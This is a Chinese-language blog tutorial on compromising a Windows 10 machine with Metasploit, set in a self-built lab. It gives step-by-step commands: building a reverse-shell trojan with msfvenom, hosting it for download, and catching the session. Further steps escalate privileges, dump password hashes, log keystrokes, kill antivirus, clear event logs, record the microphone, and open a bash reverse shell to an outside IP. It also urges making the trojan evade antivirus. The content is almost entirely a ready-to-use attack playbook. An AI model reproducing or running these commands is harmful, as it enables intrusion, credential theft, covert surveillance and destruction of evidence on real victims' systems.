msf win10系统攻击

前言:学习网络技术 本环境自己搭建
声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。

kali ip 192.168.141.129

windwos10 192.168.141.128

一、木马生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=本机ip LPORT=本机端口 -f exe > shell.exe   //保存到跟目录

 二、开启apach服务 service apache2 start

查看状态 ervice apache2 status

接下来把我们的木马文件 上传到apach里面

cp shell.exe /var/www/html

三、客户端访问下载打开 注:关闭杀毒 或者允许

 四、kali开启监听 msf

 (1)命令: use exploit/multi/handler(选择模块)

(2)命令: set payload  windows/meterpreter/reverse_tcp(选择攻击模块)

(3)命令: set LhOST 192.168.141.129(填写自己主机的IP地址)

(4)命令: set lport 3333(填写刚才生成文件时的端口号)

(5)命令: show options(查看设置参数)

(6)命令: exploit    //  -z -j(后台执行)

五、进入win10系统

注:木马可以做免杀 ,不然杀毒软件 会杀掉

六、提权

咱们权限只有管理员权限 需要提权

会话保持在后台  background 命令

在拿到meterpreter会话的前提下,我们可以利用这个模块进行收集

use post/multi/recon/local_exploit_suggester

 接下来 利用这些搜索出来的 利用exp提权

常见的提权模块如下:

ms14_058 内核模式驱动程序中的漏洞库能允许远程代码执行
ms16_016 WebDAV 本地提权漏洞(CVE-2016-0051)
ms16_032 MS16-032 Secondary Logon Handle 本地提权漏洞
常用提权命令

sysinfo 查看系统命令
migrate 注入进程
getuid 获取当前用户
getprivs 尽可能提升权限
getsystem 通过各种攻击向量来提升系统用户权限
可以先使用 getsystem 来自动提权,如果失败再手动提权

基础命令

ps 列出进程
sessions 查看会话
background 把session放置后台
sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用
interact id #切换进一个信道
back 返回主界面
shell 得到终端
search搜索模块
show 列模块
info 查看模块信息

    meterpreter > background  退出到msf命令提示符下

    meterpreter > lpwd  等价于在kali上输入pwd

    meterpreter > lcd /etc  等价于在kali上输入cd /etc

    meterpreter > run post/windows/gather/smart_hashdump  获取目标主机上用户的hash值

    meterpreter > run post/windows/capture/keylog_recorder  键盘记录

    meterpreter > run killav  结束目标主机上的杀毒软件相关进程

    meterpreter > clearev  清除系统日志

    meterpreter > download boot.ini  下载目标主机上的boot.ini文件

    meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32  上传 
    nc.exe到目标主机上。(注意要使用2个反斜杠)

    meterpreter > dir windows\\system32\\nc.exe

    meterpreter > execute -f nc -nvlp 3333  执行nc.exe

    meterpreter > execute -f "bash -i >& /dev/tcp/104.199.1.1/82 0>&1"

    meterpreter > execute -f bash -i -H

    meterpreter > execute -f cmd.exe -i -H  获得目标主机的shell,-i交互模式,-H隐藏

    meterpreter > execute -H -m -d calc.exe -f wce32.exe -a "-o foo.txt"

    meterpreter > cat foo.txt 
    -m 直接从内存中执行攻击端的可执行文件,不在硬盘存储,所以不会留下痕迹,且能避开杀毒软件的查            
    杀;-d 设置需要显示的进程名,可以避开敏感人士的检查。

	meterpreter > getuid  查看当前用户

    meterpreter > getsystem  提权到system用户

    meterpreter > getprivs  查看当前用户具有的权限

    meterpreter > getpid  查看meterpreter注入到了什么进程中

    meterpreter > migrate 1436   更改到pid1436进程中

    meterpreter > getpid  重新使用getpid命令查看

    meterpreter > hashdump  获取目标主机上用户的hash值

    meterpreter > sysinfo  查看目标系统的信息

    meterpreter > kill 188  结束188进程

    meterpreter > shell  获取目标操作系统的shell

    meterpreter > idletime  查看目标主机已经空闲了多长时间

    meterpreter > edit C:\\Windows\\System32\\drivers\\etc\\hosts  编辑hosts文件

    meterpreter > record_mic -d 10 -f /root/桌面/1.mp4  监听麦克风

    meterpreter > load python  加载python插件

后面一些操作

msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)__Cyber的博客-CSDN博客_msf键盘记录

  • 4
    点赞
  • 57
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小晨_WEB

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值